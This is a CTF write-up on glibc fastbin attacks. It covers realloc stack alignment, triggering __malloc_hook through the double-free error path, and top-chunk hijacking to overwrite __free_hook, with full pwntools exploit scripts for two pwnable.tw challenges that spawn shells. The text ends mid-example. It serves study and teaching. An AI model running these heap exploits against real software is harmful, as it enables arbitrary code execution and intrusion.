Fastbin Attack Summary

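Over the past few days I worked through four challenges, and as it happens all of them were fastbin attacks. My usual routine is to hit __malloc_hook directly with a one_gadget, but it is quite common for every one_gadget to fail. Until now the only workaround I knew was combining __realloc_hook and __malloc_hook to adjust the stack, and that has its limits too. So, drawing on several pwnable.tw challenges plus one CISCN 2019 challenge archived on CTFhub, here is a short summary of fastbin attack techniques.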

Fastbin

Free

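  1. For this part, see House of Spirit, which covers it in some detail.
  2. I have seen fastbin consolidation mentioned, but I have not run into it yet, so it is not covered here. Additions are welcome.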

Malloc

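  1. When malloc takes a chunk from a fastbin, it checks that the chunk's size matches that bin:
    // Glibc 2.27
    size_t victim_idx = fastbin_index (chunksize (victim));
    if (__builtin_expect (victim_idx != idx, 0))
      malloc_printerr ("malloc(): memory corruption (fast)");
  2. Unlike free, malloc from a fastbin does not require the chunk address to be aligned, so any address can be handed out as long as the size field passes the check.
  3. If there are other properties worth noting, additions are welcome.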
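As a rough illustration of the size check above, the sketch below re-implements the 64-bit form of the index computation in Python. The helper names are my own, and the constants assume a 64-bit Glibc (SIZE_SZ of 8, 16-byte alignment). It shows why a misaligned size field of 0x7f is accepted for a 0x68-byte request.

```python
SIZE_SZ = 8  # assumption: 64-bit glibc


def chunksize(size_field):
    # chunksize() masks off the three low flag bits of the size field
    return size_field & ~0x7


def fastbin_index(size):
    # 64-bit form of the fastbin_index macro: (sz >> 4) - 2
    return (size >> 4) - 2


def request_to_chunk_size(req):
    # Add the header, round up to 16 bytes, enforce the 0x20 minimum
    return max(0x20, (req + SIZE_SZ + 0xF) & ~0xF)


def passes_fastbin_check(request, fake_size_field):
    # True when a fake size field lands in the same bin as the request
    idx = fastbin_index(request_to_chunk_size(request))
    return fastbin_index(chunksize(fake_size_field)) == idx


if __name__ == "__main__":
    print(passes_fastbin_check(0x68, 0x7F))  # high byte of a libc address
    print(passes_fastbin_check(0x68, 0x81))  # belongs to the next bin
```

A 0x68 request maps to chunk size 0x70, and 0x7f masks down to 0x78, which shares the same index, so the stray 0x7f byte is enough.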

Fastbin attack

Since writing a one_gadget directly into __malloc_hook and triggering it through malloc often fails, here are some alternatives.

realloc, __realloc_hook, __malloc_hook

The idea is to go through realloc to adjust the stack so that the one_gadget's constraints are satisfied.

Principle


Look directly at the disassembly of __GI___libc_realloc (Glibc 2.27 here):

0x7ffff7a7cc30 <__GI___libc_realloc>:	    push   r15 
0x7ffff7a7cc32 <__GI___libc_realloc+2>: push r14
0x7ffff7a7cc34 <__GI___libc_realloc+4>: push r13
0x7ffff7a7cc36 <__GI___libc_realloc+6>: push r12
0x7ffff7a7cc38 <__GI___libc_realloc+8>: push rbp
0x7ffff7a7cc39 <__GI___libc_realloc+9>: push rbx
0x7ffff7a7cc3a <__GI___libc_realloc+10>: sub rsp,0x18
0x7ffff7a7cc3e <__GI___libc_realloc+14>: mov rax,QWORD PTR [rip+0x35238b]
0x7ffff7a7cc45 <__GI___libc_realloc+21>: mov rax,QWORD PTR [rax] ; __realloc_hook
0x7ffff7a7cc48 <__GI___libc_realloc+24>: test rax,rax ; test if __realloc_hook != NULL
0x7ffff7a7cc4b <__GI___libc_realloc+27>: jne 0x7ffff7a7cee0 <__GI___libc_realloc+688> ; prepare to call __realloc_hook
0x7ffff7a7cc51 <__GI___libc_realloc+33>: test rsi,rsi
0x7ffff7a7cc54 <__GI___libc_realloc+36>: mov rbp,rsi
0x7ffff7a7cc57 <__GI___libc_realloc+39>: mov rbx,rdi
0x7ffff7a7cc5a <__GI___libc_realloc+42>: sete al
0x7ffff7a7cc5d <__GI___libc_realloc+45>: test rdi,rdi
0x7ffff7a7cc60 <__GI___libc_realloc+48>: setne dl
0x7ffff7a7cc63 <__GI___libc_realloc+51>: and al,dl
0x7ffff7a7cc65 <__GI___libc_realloc+53>: jne 0x7ffff7a7cf10 <__GI___libc_realloc+736>
0x7ffff7a7cc6b <__GI___libc_realloc+59>: test rdi,rdi
..............
0x7ffff7a7cee0 <__GI___libc_realloc+688>: mov rdx,QWORD PTR [rsp+0x48]
0x7ffff7a7cee5 <__GI___libc_realloc+693>: add rsp,0x18
0x7ffff7a7cee9 <__GI___libc_realloc+697>: pop rbx
0x7ffff7a7ceea <__GI___libc_realloc+698>: pop rbp
0x7ffff7a7ceeb <__GI___libc_realloc+699>: pop r12
0x7ffff7a7ceed <__GI___libc_realloc+701>: pop r13
0x7ffff7a7ceef <__GI___libc_realloc+703>: pop r14
0x7ffff7a7cef1 <__GI___libc_realloc+705>: pop r15
0x7ffff7a7cef3 <__GI___libc_realloc+707>: jmp rax ; jump to __realloc_hook to execute
0x7ffff7a7cef5 <__GI___libc_realloc+709>: nop DWORD PTR [rax]
0x7ffff7a7cef8 <__GI___libc_realloc+712>: mov rax,QWORD PTR [rip+0x351f69]
0x7ffff7a7ceff <__GI___libc_realloc+719>: xor r13d,r13d
0x7ffff7a7cf02 <__GI___libc_realloc+722>: mov DWORD PTR fs:[rax],0xc
0x7ffff7a7cf09 <__GI___libc_realloc+729>: jmp 0x7ffff7a7ce1e <__GI___libc_realloc+494>
0x7ffff7a7cf0e <__GI___libc_realloc+734>: xchg ax,ax
0x7ffff7a7cf10 <__GI___libc_realloc+736>: call 0x7ffff7a7b950 <__GI___libc_free>
0x7ffff7a7cf15 <__GI___libc_realloc+741>: xor r13d,r13d
0x7ffff7a7cf18 <__GI___libc_realloc+744>: jmp 0x7ffff7a7ce1e <__GI___libc_realloc+494>
0x7ffff7a7cf1d <__GI___libc_realloc+749>: nop DWORD PTR [rax]
0x7ffff7a7cf20 <__GI___libc_realloc+752>: mov rdx,QWORD PTR [rip+0x351e59]

Keeping only the path taken when __realloc_hook is set, the code above reduces to:

0x7ffff7a7cc30 <__GI___libc_realloc>:	    push   r15 
0x7ffff7a7cc32 <__GI___libc_realloc+2>: push r14
0x7ffff7a7cc34 <__GI___libc_realloc+4>: push r13
0x7ffff7a7cc36 <__GI___libc_realloc+6>: push r12
0x7ffff7a7cc38 <__GI___libc_realloc+8>: push rbp
0x7ffff7a7cc39 <__GI___libc_realloc+9>: push rbx
0x7ffff7a7cc3a <__GI___libc_realloc+10>: sub rsp,0x18
0x7ffff7a7cc3e <__GI___libc_realloc+14>: mov rax,QWORD PTR [rip+0x35238b] ; __realloc_hook
0x7ffff7a7cc45 <__GI___libc_realloc+21>: mov rax,QWORD PTR [rax] ; *__realloc_hook
0x7ffff7a7cee0 <__GI___libc_realloc+688>: mov rdx,QWORD PTR [rsp+0x48]
0x7ffff7a7cee5 <__GI___libc_realloc+693>: add rsp,0x18
0x7ffff7a7cee9 <__GI___libc_realloc+697>: pop rbx
0x7ffff7a7ceea <__GI___libc_realloc+698>: pop rbp
0x7ffff7a7ceeb <__GI___libc_realloc+699>: pop r12
0x7ffff7a7ceed <__GI___libc_realloc+701>: pop r13
0x7ffff7a7ceef <__GI___libc_realloc+703>: pop r14
0x7ffff7a7cef1 <__GI___libc_realloc+705>: pop r15
0x7ffff7a7cef3 <__GI___libc_realloc+707>: jmp rax ; jump to *__realloc_hook to execute

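As the listing shows, realloc starts with six pushes and one sub rsp,0x18; right before jumping to __realloc_hook it pops six times and does one add rsp,0x18 to rebalance the stack.

So by skipping some of the pushes, or by jumping straight to __GI___libc_realloc+14, the stack frame is shifted by the time the hook is called, which can be enough to satisfy the one_gadget's constraint.

Therefore, writing realloc+X into __malloc_hook and the one_gadget into __realloc_hook is enough to adjust the stack. To pick X, debug up to the point where the one_gadget executes, check how far down the stack a zero slot sits, and adjust accordingly.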

malloc ==> __malloc_hook(realloc+X) ==> __realloc_hook(onegadget)


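Note that this method does not always work: there may be no zero stack slot within the adjustable range, or a slot that used to be zero may be overwritten after the adjustment.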
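To make the choice of X a bit more concrete, here is a small sketch that tabulates how far rsp moves for each possible entry offset. The offsets and operand sizes are copied from the Glibc 2.27 listing above; other builds may lay out the prologue differently, so treat the table as an assumption to verify in a debugger.

```python
# (offset inside realloc, bytes subtracted from rsp), read off the listing above
PROLOGUE = [
    (0, 8),      # push r15
    (2, 8),      # push r14
    (4, 8),      # push r13
    (6, 8),      # push r12
    (8, 8),      # push rbp
    (9, 8),      # push rbx
    (10, 0x18),  # sub rsp,0x18
]

# The hook path always runs add rsp,0x18 followed by six pops
EPILOGUE_RESTORE = 0x18 + 6 * 8


def rsp_shift(entry_offset):
    """Net change of rsp between entering realloc+entry_offset and `jmp rax`."""
    pushed = sum(size for off, size in PROLOGUE if off >= entry_offset)
    return EPILOGUE_RESTORE - pushed


if __name__ == "__main__":
    for x in (0, 2, 4, 6, 8, 9, 10, 14):
        print("realloc+%d shifts rsp by %s" % (x, hex(rsp_shift(x))))
```

With a shift of s, a constraint such as [rsp+0x50]==NULL is effectively checked against the slot s bytes further along than it would be when the one_gadget sits in __malloc_hook directly.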

Example

I do not have an example to offer for now, but the method is simple and easy to follow, so the principle should be enough.

fastbin corruption

Because of the fastbin double free check, a double free calls malloc_printerr, which indirectly calls malloc and thereby triggers __malloc_hook.

Principle

There is not much to add: a fastbin double free corruption error is used to call __malloc_hook, and on that call path the one_gadget's constraint happens to be satisfied.
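For readers unfamiliar with the check being abused, the following toy model (my own simplification, not Glibc code) captures the one property that matters: free only compares the chunk against the current head of the fastbin. That is why an A, B, A sequence goes through while freeing the same chunk twice in a row aborts.

```python
class FastbinModel:
    """Toy model of a single fastbin: a LIFO list with the 'fasttop' check."""

    def __init__(self):
        self.chunks = []  # the last element is the head of the bin

    def free(self, chunk):
        # Only the current head is compared against the chunk being freed
        if self.chunks and self.chunks[-1] == chunk:
            raise RuntimeError("double free or corruption (fasttop)")
        self.chunks.append(chunk)


def try_frees(order):
    """Free the given chunk ids in order; return 'ok' or the abort message."""
    fastbin = FastbinModel()
    try:
        for chunk in order:
            fastbin.free(chunk)
    except RuntimeError as err:
        return str(err)
    return "ok"


if __name__ == "__main__":
    print(try_frees([0, 1, 0]))  # classic double free, not detected
    print(try_frees([8, 8]))     # detected, which is the abort path used here
```

In the exploits below, the first pattern builds the write primitive and the second one is used on purpose as the trigger.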

Examples

Secret Garden

The delete function has an obvious bug: the pointer is not cleared after free, so a fastbin double free is possible.

int delete()
{
int result; // eax
_DWORD *v1; // rax
unsigned int v2; // [rsp+4h] [rbp-14h]
unsigned __int64 v3; // [rsp+8h] [rbp-10h]

v3 = __readfsqword(0x28u);
if ( !chunk_number )
return puts("No flower in the garden");
__printf_chk(1LL, "Which flower do you want to remove from the garden:");
__isoc99_scanf("%d", &v2);
if ( v2 <= 0x63 && (v1 = (_DWORD *)chunk_array[v2]) != 0LL )
{
*v1 = 0;
free(*(void **)(chunk_array[v2] + 8LL));
result = puts("Successful");
}
else
{
puts("Invalid choice");
result = 0;
}
return result;
}

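Main exploitation idea:

  1. First free a chunk into the unsorted bin and allocate it back, then use the view function to leak the main_arena address left in the unsorted chunk's bk. That gives the libc base and the address of __malloc_hook.

  2. Because fastbin allocation checks the size, we cannot allocate directly at __malloc_hook. Instead, the high byte 0x7F of an address stored just above it is used as a fake size field to get the allocation at the target.

  3. After trying them all, no one_gadget works when triggered directly, so a fastbin double free corruption error is used to trigger __malloc_hook indirectly. The one_gadget used here is the one whose constraint is [rsp+0x50]==NULL.
    Exploit (a few parts look odd because I tried the realloc stack adjustment first, it failed, and I did not bother cleaning up):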

    context.log_level = "debug"

    def add(length, name, color):
        p.sendlineafter("Your choice : ", "1")
        p.sendlineafter("Length of the name :", str(length))
        p.sendafter("The name of flower :", name)
        p.sendlineafter("The color of the flower :", color)

    def view(index):
        p.sendlineafter("Your choice : ", "2")
        p.recvuntil("Name of the flower[" + str(index) + "] :")
        return p.recvuntil("\n")[:-1]

    def delete(index):
        p.sendlineafter("Your choice : ", "3")
        p.sendlineafter("Which flower do you want to remove from the garden:", str(index))

    main_arena_offset = 0x3c3b20
    realloc_hook_offset = 0x00000000003c3b08 # libc.symbols["__realloc_hook"] # __malloc_hook = __realloc_hook + 0x8
    realloc_offset = libc.symbols["realloc"]
    # one_gadget_offset = 0xf0567
    one_gadget_offset = 0xef6c4
    # one_gadget_offset = 0x4526a

    # fast bin double free
    add(0x68, "AAAA", "AAAA") # chunk 0
    add(0x68, "BBBB", "BBBB") # chunk 1
    delete(0)
    delete(1)
    delete(0)

    # leak heap address
    # don't break the double free loop
    add(0x68, "\xe0", "AAAA") # chunk 2
    heap_addr = u64(view(2).ljust(8, "\x00"))
    heap_base = heap_addr - 0x10e0

    # unsorted bin
    add(0x200, "CCCC", "CCCC") # chunk 3
    add(0x48, "DDDD", "DDDD") # chunk 4
    delete(3)

    # leak libc
    add(0x48, "E" * 8, "EEEE") # chunk 5
    main_arena = u64(view(5)[8:].ljust(8, "\x00")) - 0x58
    libc_base = main_arena - main_arena_offset
    realloc_hook = libc_base + realloc_hook_offset
    libc_realloc = libc_base + realloc_offset
    one_gadget = libc_base + one_gadget_offset

    # use the double free
    add(0x68, p64(realloc_hook + 8 - 0x23), "EEEE") # chunk 6
    add(0x68, "FFFF", "FFFF") # chunk 7
    add(0x68, "GGGG", "GGGG") # chunk 8

    # write realloc_hook and malloc_hook
    add(0x68, (p64(one_gadget) + p64(one_gadget)).rjust(0x1b, "H"), "HHHH") # chunk 9

    # trigger malloc_hook (use malloc_printerr, directly call malloc won't work)
    # p.sendlineafter("Your choice : ", "1")
    delete(8)
    delete(8)

    success("heap_addr: " + hex(heap_addr))
    success("heap_base: " + hex(heap_base))
    success("main_arena: " + hex(main_arena))
    success("libc_base: " + hex(libc_base))
    success("libc_realloc: " + hex(libc_realloc))
    success("realloc_hook: " + hex(realloc_hook))
    success("one_gadget: " + hex(one_gadget))

    p.interactive()
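The padding in the hook-writing step can be checked with a few lines of arithmetic. This is only a sketch: the helper names and the sample address are made up for illustration, while the 0x23 and 0x1b constants come from the exploit above.

```python
import struct


def p64(value):
    # Little-endian 8-byte packing, like the pwntools helper of the same name
    return struct.pack("<Q", value)


def hook_payload(realloc_hook_value, malloc_hook_value, pad=b"H"):
    # Same shape as the exploit: two qwords right-justified to 0x1b bytes
    return (p64(realloc_hook_value) + p64(malloc_hook_value)).rjust(0x1B, pad)


def landing_address(malloc_hook, payload, needle):
    # The fake chunk header sits at __malloc_hook - 0x23, so user data
    # starts 0x10 bytes later, at __malloc_hook - 0x13
    data_start = (malloc_hook - 0x23) + 0x10
    return data_start + payload.index(needle)


if __name__ == "__main__":
    malloc_hook = 0x7F0000003B10  # hypothetical address, illustration only
    a, b = 0x1111111111111111, 0x2222222222222222
    payload = hook_payload(a, b)
    print(hex(landing_address(malloc_hook, payload, p64(a))))  # __realloc_hook
    print(hex(landing_address(malloc_hook, payload, p64(b))))  # __malloc_hook
```

The first qword lands 0xb bytes into the user data, which is __malloc_hook - 8 (that is, __realloc_hook), and the second lands exactly on __malloc_hook.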

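    A few asides:
    I searched a lot for how malloc_printerr ends up triggering __malloc_hook and could not find an explanation. I still really wanted to know, so what to do?
    Write puts into __malloc_hook, set a breakpoint on puts before triggering, and use gdb's backtrace to look at the call stack. It is buried deep (it is still malloc that triggers the hook, just a malloc reached through many layers of calls, so a breakpoint directly on malloc would do as well).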

    #0  _IO_puts (str=0x24 <error: Cannot access memory at address 0x24>) at ioputs.c:33
    #1 0x00007fe6f4da3d8a in __strdup (s=0x7ffd7c35b6a0 "/lib/x86_64-linux-gnu/libgcc_s.so.1") at strdup.c:42
    #2 0x00007fe6f4d9f60f in _dl_load_cache_lookup (name=name@entry=0x7fe6f4b49aa6 "libgcc_s.so.1") at dl-cache.c:311
    #3 0x00007fe6f4d8ff99 in _dl_map_object (loader=loader@entry=0x7fe6f4fab4d8, name=name@entry=0x7fe6f4b49aa6 "libgcc_s.so.1", type=type@entry=0x2, trace_mode=trace_mode@entry=0x0, mode=mode@entry=0x90000001, nsid=<optimized out>) at dl-load.c:2342
    #4 0x00007fe6f4d9c3a7 in dl_open_worker (a=a@entry=0x7ffd7c35bd90) at dl-open.c:237
    #5 0x00007fe6f4d97394 in _dl_catch_error (objname=objname@entry=0x7ffd7c35bd80, errstring=errstring@entry=0x7ffd7c35bd88, mallocedp=mallocedp@entry=0x7ffd7c35bd7f, operate=operate@entry=0x7fe6f4d9c300 <dl_open_worker>, args=args@entry=0x7ffd7c35bd90) at dl-error.c:187
    #6 0x00007fe6f4d9bbd9 in _dl_open (file=0x7fe6f4b49aa6 "libgcc_s.so.1", mode=0x80000001, caller_dlopen=0x7fe6f4ad2fd1 <__GI___backtrace+193>, nsid=0xfffffffffffffffe, argc=<optimized out>, argv=<optimized out>, env=0x7ffd7c35cac8) at dl-open.c:660
    #7 0x00007fe6f4b009bd in do_dlopen (ptr=ptr@entry=0x7ffd7c35bfb0) at dl-libc.c:87
    #8 0x00007fe6f4d97394 in _dl_catch_error (objname=0x7ffd7c35bfa0, errstring=0x7ffd7c35bfa8, mallocedp=0x7ffd7c35bf9f, operate=0x7fe6f4b00980 <do_dlopen>, args=0x7ffd7c35bfb0) at dl-error.c:187
    #9 0x00007fe6f4b00a74 in dlerror_run (args=0x7ffd7c35bfb0, operate=0x7fe6f4b00980 <do_dlopen>) at dl-libc.c:46
    #10 __GI___libc_dlopen_mode (name=name@entry=0x7fe6f4b49aa6 "libgcc_s.so.1", mode=mode@entry=0x80000001) at dl-libc.c:163
    #11 0x00007fe6f4ad2fd1 in init () at ../sysdeps/x86_64/backtrace.c:52
    #12 __GI___backtrace (array=array@entry=0x7ffd7c35c010, size=size@entry=0x40) at ../sysdeps/x86_64/backtrace.c:105
    #13 0x00007fe6f49dd9f5 in backtrace_and_maps (do_abort=<optimized out>, do_abort@entry=0x2, written=<optimized out>, fd=fd@entry=0x3) at ../sysdeps/unix/sysv/linux/libc_fatal.c:47
    #14 0x00007fe6f4a357e5 in __libc_message (do_abort=do_abort@entry=0x2, fmt=fmt@entry=0x7fe6f4b4e2e0 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:172
    #15 0x00007fe6f4a3de0a in malloc_printerr (ar_ptr=<optimized out>, ptr=<optimized out>, str=0x7fe6f4b4e3a8 "double free or corruption (fasttop)", action=0x3) at malloc.c:5004
    #16 _int_free (av=<optimized out>, p=<optimized out>, have_lock=0x0) at malloc.c:3865
    #17 0x00007fe6f4a4198c in __GI___libc_free (mem=<optimized out>) at malloc.c:2966
    #18 0x000055eca8269e79 in ?? ()
    #19 0x000000087c35cab0 in ?? ()
    #20 0x77c3b85bb5ec5800 in ?? ()
    #21 0x0000000000000000 in ?? ()

    In the end, a malloc call inside __strdup triggers __malloc_hook:

    char *
    __strdup (const char *s)
    {
    size_t len = strlen (s) + 1;
    void *new = malloc (len);

    if (new == NULL)
    return NULL;

    return (char *) memcpy (new, s, len);
    }

    (I am a bit curious how anyone found this in the first place; impressive.)

    Heap Paradise

    The program is simple. The delete function has the same obvious bug, the pointer is not cleared after free, so once again this is a fastbin double free:

    void delete()
    {
    __int64 v0; // [rsp+8h] [rbp-8h]

    printf("Index :");
    v0 = choice();
    if ( v0 <= 15 )
    free(chunk_array[v0]);
    }

    The add function, however, limits the size of the chunks that can be allocated:

    int add()
    {
    size_t v0; // rax
    int i; // [rsp+4h] [rbp-Ch]
    unsigned int size; // [rsp+8h] [rbp-8h]

    for ( i = 0; ; ++i )
    {
    if ( i > 15 )
    {
    LODWORD(v0) = puts("You can't allocate anymore !");
    return v0;
    }
    if ( !chunk_array[i] )
    break;
    }
    printf("Size :");
    v0 = choice();
    size = v0;
    if ( v0 <= 0x78 )
    {
    chunk_array[i] = malloc(v0);
    if ( !chunk_array[i] )
    {
    puts("Error!");
    exit(-1);
    }
    printf("Data :");
    LODWORD(v0) = read_data((__int64)chunk_array[i], size);
    }
    return v0;
    }

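    Main idea:

  1. Use the fastbin double free to build a chunk overlap and create an unsorted bin chunk.

  2. The challenge has no view function, so the only option is a partial overwrite of the unsorted chunk's fd so that it points near the _IO_2_1_stdout_ structure, then allocate that area through the fastbin and modify the structure to leak libc.

  3. Once libc is leaked, use the fastbin double free again to overwrite __malloc_hook with the one_gadget.

  4. The hard part is that only 16 chunks can be allocated. Fitting all of this into so few chunks is a test of heap layout skills, so I will not go through the layout in detail here.
    Also, my layout uses up every add by the time the steps above are done, so the only way left to trigger __malloc_hook is the fastbin double free corruption error.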
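The stdout overwrite in step 2 can be sketched as follows. The three flag constants are the values from Glibc's libio headers; the function name and the default padding are my own, with 0x33 matching a fake chunk placed 0x43 bytes before the structure, as the exploit below does.

```python
import struct

# Flag values as defined in glibc's libio headers
_IO_MAGIC = 0xFBAD0000
_IO_CURRENTLY_PUTTING = 0x0800
_IO_IS_APPENDING = 0x1000


def p64(value):
    return struct.pack("<Q", value)


def stdout_leak_payload(pad_len=0x33):
    """Bytes written through a fake chunk that starts 0x43 before stdout."""
    flags = _IO_MAGIC | _IO_CURRENTLY_PUTTING | _IO_IS_APPENDING
    body = p64(flags)    # _flags
    body += p64(0) * 3   # _IO_read_ptr, _IO_read_end, _IO_read_base
    body += b"\x00"      # low byte of _IO_write_base only
    return b"J" * pad_len + body


if __name__ == "__main__":
    payload = stdout_leak_payload()
    print(hex(len(payload)), payload[0x33:0x3B].hex())
```

Clearing the low byte of _IO_write_base makes the next flush print the bytes between the lowered base and the write pointer, which include libc pointers. Because only the low 12 bits of the partially overwritten address are known, the remaining nibble is a guess (the 4-bit brute force noted in the exploit), hence the retry loop.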

    My exploit (this is certainly not the only possible layout; for reference only):

    one_gadget_offset = 0xef6c4
    malloc_hook_offset = libc.symbols["__malloc_hook"]

    # context.log_level = "debug"

    def add(size, data):
        p.sendlineafter("You Choice:", "1")
        p.sendlineafter("Size :", str(size))
        p.sendafter("Data :", data)

    def delete(index):
        p.sendlineafter("You Choice:", "2")
        p.sendlineafter("Index :", str(index))

    libc_offset = 0x3c4600

    while True:
        try:
            # fastbin double free
            add(0x68, p64(0) + p64(0x71)) # chunk 0
            add(0x28, "BBBB") # chunk 1
            add(0x28, "CCCC") # chunk 2
            add(0x68, "D" * 0x40 + p64(0) + p64(0x21)) # chunk 3
            delete(0)
            delete(3)
            delete(0)

            # create unsorted bin
            add(0x68, "\x10") # chunk 4
            add(0x68, "DDDD") # chunk 5
            add(0x68, "EEEE") # chunk 6
            add(0x68, "F" * 0x50 + p64(0) + p64(0xb1)) # chunk 7

            # free unsorted bin
            delete(1)

            # malloc unsorted bin, perform partial write to stdout
            delete(3)
            add(0x58, "G" * 0x20 + p64(0) + p64(0x81) + p64(0)) # chunk 8
            delete(2)

            # brute force 4 bits
            add(0x78, "H" * 0x20 + p64(0) + p64(0x71) + p16(0xa620 - 0x43)) # chunk 9

            add(0x68, "IIII") # chunk 10
            add(0x68, "J" * 0x33 + p64(0xfbad1800) + p64(0) * 3 + "\x00") # chunk 11

            string = p.recv(4)
            if string == "****" or string == "read":
                # wrong guess: restart the target and try again
                p.close()
                if _pwn_remote == 0:
                    p = process(argv=[_proc], env=_setup_env())
                else:
                    p = remote('chall.pwnable.tw', 10308)
                if _debug != 0:
                    gdb.attach(p)
            else:
                p.recv(0x40-4)
                libc_addr = u64(p.recv(8))
                libc_base = libc_addr - 0x3c4600
                malloc_hook = libc_base + malloc_hook_offset
                one_gadget = libc_base + one_gadget_offset
                break

        except:
            p.close()
            if _pwn_remote == 0:
                p = process(argv=[_proc], env=_setup_env())
            else:
                p = remote('chall.pwnable.tw', 10308)
            if _debug != 0:
                gdb.attach(p)

    # write __malloc_hook
    delete(0)
    delete(3)
    delete(0)
    add(0x68, p64(malloc_hook - 0x23)) # chunk 12
    add(0x68, "KKKK") # chunk 13
    add(0x68, "LLLL") # chunk 14
    add(0x68, "I" * 0x13 + p64(one_gadget)) # chunk 15

    # double free error ==> malloc_printerr ==> __malloc_hook
    delete(1)
    delete(1)

    if _pwn_remote == 1:
        context.log_level = "debug"
        p.send("cat /home/heap_paradise/flag\x00")

    success("libc_addr: " + hex(libc_addr))
    success("libc_base: " + hex(libc_base))
    # success("libc_realloc: " + hex(libc_realloc))
    success("malloc_hook: " + hex(malloc_hook))
    success("one_gadget: " + hex(one_gadget))

    p.interactive()

write __free_hook through top chunk

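This is probably one of the most reliable methods, since calling system("/bin/sh") directly generally has no constraints, though the exploitation takes a bit more work.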

Principle

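We know that malloc from a fastbin must satisfy the size check, but everything just above __free_hook is "\x00", so a direct allocation is clearly impossible and another approach is needed.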

First, look at the layout of main_arena (this is before any heap information has been written):

gef➤  p main_arena
$1 = {
mutex = 0x0,
flags = 0x0,
have_fastchunks = 0x0,
fastbinsY = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},
top = 0x0,
last_remainder = 0x0,
bins = {0x0 <repeats 254 times>},
binmap = {0x0, 0x0, 0x0, 0x0},
next = 0x7ffff7dcfc40 <main_arena>,
next_free = 0x0,
attached_threads = 0x1,
system_mem = 0x0,
max_system_mem = 0x0
}

The top field stores the location of the top chunk. When memory has to come from the top chunk, its location is read from here and the chunk is then split (the dump below is from Glibc 2.27):

gef➤  p main_arena
$2 = {
mutex = 0x0,
flags = 0x0,
have_fastchunks = 0x0,
fastbinsY = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},
top = 0x555555757270,
last_remainder = 0x0,
bins = {
0x7ffff7dcfca0 <main_arena+96>, 0x7ffff7dcfca0 <main_arena+96>,
0x7ffff7dcfcb0 <main_arena+112>, 0x7ffff7dcfcb0 <main_arena+112>,
......
0x7ffff7dd0480 <main_arena+2112>, 0x7ffff7dd0480 <main_arena+2112>
}
binmap = {0x0, 0x0, 0x0, 0x0},
next = 0x7ffff7dcfc40 <main_arena>,
next_free = 0x0,
attached_threads = 0x1,
system_mem = 0x21000,
max_system_mem = 0x21000
}

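So we can change top in main_arena to point at some region above __free_hook (one that holds a large enough value to serve as the size field), and then keep allocating from the top chunk until the writes reach __free_hook.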

However, looking at the memory above main_arena shows that a single fastbin attack cannot directly allocate a region from which top can be written.

So one more fastbin attack is needed: the first one writes a size just above top, and the following fastbin attack uses that size to overwrite top.
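The two stages can be sanity-checked with plain address arithmetic. The sketch below uses the offsets that appear in the pwn4 exploit further down (main_arena at __malloc_hook + 0x10 and top at main_arena + 0x60 for that Glibc 2.27 build). The function names are mine, and other libc builds may differ.

```python
MALLOC_HOOK_OFF = 0x3EBC30  # offsets taken from the exploit in this section
MAIN_ARENA_OFF = 0x3EBC40
TOP_OFF_IN_ARENA = 0x60     # the unsorted bin pointers show main_arena+96


def stage1_writes(malloc_hook):
    """Addresses hit by "F"*0x13 + p64(0) + p64(0x71)*3 through the first
    fake chunk, whose header sits at __malloc_hook - 0x23."""
    data = (malloc_hook - 0x23) + 0x10
    off = 0x13
    return {
        data + off: 0x0,           # __malloc_hook stays NULL
        data + off + 0x08: 0x71,   # becomes the size field for stage 2
        data + off + 0x10: 0x71,
        data + off + 0x18: 0x71,
    }


def stage2_top_address(malloc_hook):
    """Address hit by the qword after "\\x00"*0x60 through the second fake
    chunk, whose header sits at __malloc_hook itself."""
    data = malloc_hook + 0x10
    return data + 0x60


if __name__ == "__main__":
    hook = MALLOC_HOOK_OFF  # libc base of 0 keeps the numbers readable
    for addr, value in sorted(stage1_writes(hook).items()):
        print(hex(addr), hex(value))
    print(hex(stage2_top_address(hook)))
```

Stage 1 plants 0x71 at __malloc_hook + 8, which is exactly where the size field of a chunk starting at __malloc_hook lives, and stage 2 then reaches main_arena + 0x60.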

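One question remains: where to move the top chunk. Debugging shows a sufficiently large (random) value at __free_hook-0xb58 that can act as the top chunk's size (I do not know whether this differs across Glibc versions; it held for the Glibc 2.23 and Glibc 2.27 builds tested here):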

gef➤  p &__free_hook
$2 = (void (**)(void *, const void *)) 0x7ffff7dd18e8 <__free_hook>
gef➤ tele 0x7ffff7dd18e8-0xb58
0x00007ffff7dd0d90│+0x0000: 0x0000000000000004
0x00007ffff7dd0d98│+0x0008: 0x9aa83c6e1b4e13d1
0x00007ffff7dd0da0│+0x0010: 0x0000000000000000
0x00007ffff7dd0da8│+0x0018: 0x0000000000000000
0x00007ffff7dd0db0│+0x0020: 0x0000000000000000
0x00007ffff7dd0db8│+0x0028: 0x0000000000000000
0x00007ffff7dd0dc0│+0x0030: 0x0000000000000000
0x00007ffff7dd0dc8│+0x0038: 0x0000000000000000
0x00007ffff7dd0dd0│+0x0040: 0x0000000000000000
0x00007ffff7dd0dd8│+0x0048: 0x0000000000000000

This hijacks the top chunk. Keep calling malloc until system's address can be written into __free_hook, then free a chunk containing "/bin/sh" to get a shell.
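As a small aid for planning the final write, this sketch shows the request-to-chunk-size rounding on 64-bit Glibc and the layout of the last payload used in the exploit below. The helper names and the sample system address are assumptions for illustration; how many allocations are needed depends on what else is still sitting in the bins, so that part has to be worked out in a debugger.

```python
import struct


def p64(value):
    return struct.pack("<Q", value)


def request_to_chunk_size(req):
    # 64-bit rounding: add the 8-byte header, align to 16, minimum 0x20
    return max(0x20, (req + 8 + 0xF) & ~0xF)


def free_hook_payload(system_addr):
    # "/bin/sh" first so the freed pointer is the command string, zero
    # padding in between, system's address last
    return b"/bin/sh\x00" + b"\x00" * 0x70 + p64(system_addr)


if __name__ == "__main__":
    system_addr = 0x7FFFF7A33440  # hypothetical address, illustration only
    payload = free_hook_payload(system_addr)
    print(hex(payload.index(p64(system_addr))))
    print(hex(request_to_chunk_size(0x100)), hex(request_to_chunk_size(0xE8)))
```

Since system's address sits 0x78 bytes into the payload, the last chunk's user data has to begin at __free_hook - 0x78; freeing that same chunk then passes a pointer to "/bin/sh" as the argument.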

Example

CISCN-2019-华东北赛区-Pwn-pwn4

The get_size helper used by edit allows a one-byte overflow; this off-by-one can be used to create a chunk overlap and from there a UAF:

__int64 edit()
{
int v1; // [rsp+Ch] [rbp-14h]
signed int v2; // [rsp+Ch] [rbp-14h]
signed int v3; // [rsp+10h] [rbp-10h]
